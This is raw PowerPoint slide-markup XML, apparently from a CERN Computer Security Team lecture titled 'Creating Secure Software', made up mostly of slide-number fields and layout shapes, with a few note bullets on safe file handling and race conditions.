              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146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780323E-3443-4609-81A4-6A8D89B21700}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1157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8064F80-3B52-4253-8996-E7B9637F763A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1167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E2CE77C-76FA-417E-AB83-F6100CB6CE6B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136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FAB4B9A-4E09-4B68-B775-E990122F5F31}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177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9CBD707-E8EB-4EAA-8215-BFE9BBA6C979}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187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20D05CF-4D6B-4FED-A74C-4A2807AFFED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4590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168C1A0-F605-4AE1-885C-472E8CC4376C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1198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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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70776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68BC1C2-E8FD-402D-AF1E-6FA023238A49}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1228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5D31D50-60EF-4D9D-8517-12F94E1412DF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239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EF83361-E80D-42E4-BB55-BF36792B2408}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1249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7449C12-B929-482C-A48A-BAF88DBD64CF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1259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CB55CDC-25DF-4E26-BE12-7B3161BF6E32}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/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FAB6CA4-B475-4B19-8801-7F4300C05648}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1280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2E56483-8997-409D-9814-982547361BA2}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1290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E8AECEB-8778-4E78-82D4-D07141901AB4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1300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6AF88DC-90FE-487C-8C06-93C4687537E7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1136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FE09C5A-C77E-4A8B-A534-E14C43A06666}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1310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8A1F484-ECD8-4A38-9D09-60E67A84484F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133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109913" y="703263"/>
            <a:ext cx="3376612" cy="2532062"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/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D63F2D4-41FC-4185-8D0B-6B0E0612D82F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134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41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85900" y="3481388"/>
            <a:ext cx="6635750" cy="29845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82648AF-F428-4B20-B213-A9356C538063}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135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F623E07-3F80-419A-86C3-FDF962B0921E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136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480E41D-3AA9-450E-84B1-F1F18CD81B98}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137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8A07383-E532-453B-9B6B-123D1D0427D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138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8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85900" y="3481388"/>
            <a:ext cx="6635750" cy="29845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b="1" smtClean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2F984CD-8792-4AD5-9019-1564A9D4D882}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139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9EF8E8B-40E6-4C8E-AEE4-0D03CC2EC4DE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140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D4FF420-8111-483F-AAE6-65C356E2AED4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141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1118CC2-143F-4148-92BD-29FB1CD20FA2}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1013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5EA8EC9-2AE2-48F2-AC5E-A483C9DFAB06}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152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2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182708C-D996-4E37-86CA-9EDD9FADB420}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143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5767F23-419F-4D76-865B-0319AFC9AFD0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144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D5173B0-D6F7-4012-BF7E-B96B06ACD62F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145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3ED0BEF-54F6-4912-AC9E-8DC71F59560C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146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89EB682-02EE-4567-8BBA-4CC4E9DD9212}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147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70213" y="549275"/>
            <a:ext cx="3660775" cy="2744788"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr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746BDFF-569F-47E5-8E68-C38FC1BF2FC0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148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DCCE079-EB0D-4892-8C67-95DD3D9BCC6C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149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95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85900" y="3481388"/>
            <a:ext cx="6635750" cy="29845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en-US" b="1" smtClean="0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DD4DF6E-AEF0-4C6D-8387-11381ED97C2F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150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19E40B1-3DAF-462E-9FB4-27F03CCBA744}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151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3D90F4B-4A2D-4748-8273-BC80CFCA9AF2}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044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D95EC3A-1C24-4DC8-9160-B45660AB84F1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152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FF33A75-8597-4037-B888-99F9BCE171C3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153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C91A4E2-B8CA-4EF3-BC4D-FD380ED3DFC8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154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46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85900" y="3481388"/>
            <a:ext cx="6635750" cy="29845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b="1" smtClean="0"/>
              <a:t>•	possible risks start with overwriting logs etc. to much more major problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Use a filename only once in a code, later refer to the file by its handle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>•	… or if someone executes some code, or changes environment between two commands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B4EEEE1-7524-49B3-962C-9E79663ADBC7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155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BAEEB35-D410-4806-B668-80D1C47FFC70}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156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A633D2C-13BB-43EE-A008-04AB1C23C989}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157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CB4BA6B-8A9D-4B7B-977B-D2522CD31F4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158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1B583F9-6E37-46A0-BD63-C64A713328AC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159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3CBEB65-3FDC-4374-8C3D-EE67E53BC7FA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160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05E47C2-A4F2-407B-A726-1F537014D928}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161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70213" y="549275"/>
            <a:ext cx="3660775" cy="2744788"/>
          </a:xfrm>
          <a:ln/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D2109FD-A29B-40CE-9BC3-96F97B4D381A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1064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4A5E2BC-7ABF-4580-8AD3-4B44DC4EC15C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162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4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smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1638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8B444DC-F48B-43DC-90D9-2ABE40B699DE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0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6A78D80-A237-46D5-B9BE-CBE224F1F790}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164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0BBCE2D-A15A-43F1-900D-F7ED9BD506E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165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6CFD9AD-612A-4E3B-9226-2E06FFA2B588}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166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6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3A6BDFA-842A-461F-A413-08E2F2F53BB9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167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6159246-4D62-4F97-8166-22C104FA4623}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171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601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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860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88A3CA2-B098-4802-9280-6DB203967C1A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>84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2C967AD-5625-4C27-AD14-7644AE4055A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054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05B601C-D7E6-475A-8FEF-03FE6B5D25D9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075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91F5965-79FD-452E-8D1E-7D22642F561E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="0" y="6443663"/>
            <a:ext cx="9144000" cy="36512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="17175E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3333CC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wrap="none" lIns="82945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="836613"/>
            <a:ext cx="9144000" cy="36512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="17175E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3333CC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45" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US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174243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5129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9100" y="188913"/>
            <a:ext cx="2195513" cy="61198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9388" y="188913"/>
            <a:ext cx="6437312" cy="61198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6418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13340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219383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0825" y="1125538"/>
            <a:ext cx="4279900" cy="51831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3125" y="1125538"/>
            <a:ext cx="4281488" cy="51831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92619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9582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60569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580425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039711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955938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3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="0" y="6443663"/>
            <a:ext cx="9144000" cy="36512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="17175E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3333CC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wrap="none" lIns="82945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="836613"/>
            <a:ext cx="9144000" cy="36512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="17175E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3333CC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45" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US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125538"/>
            <a:ext cx="8713788" cy="5183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9" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="350838" y="6489700"/>
            <a:ext cx="2794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fld id="{393141B5-ABE2-4D8D-AE79-294D4AD5F5FA}" type="slidenum">
              <a:rPr lang="en-GB" b="1"/>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1530350" y="6540500"/>
            <a:ext cx="2012950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300" b="1"/>
              <a:t>Creating Secure Software</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4787900" y="6540500"/>
            <a:ext cx="4297363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pl-PL" sz="1300" b="1"/>
              <a:t>Sebastian Lopienski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1300" b="1"/>
              <a:t> CERN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1"/>
              <a:t>Computer Security Team</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
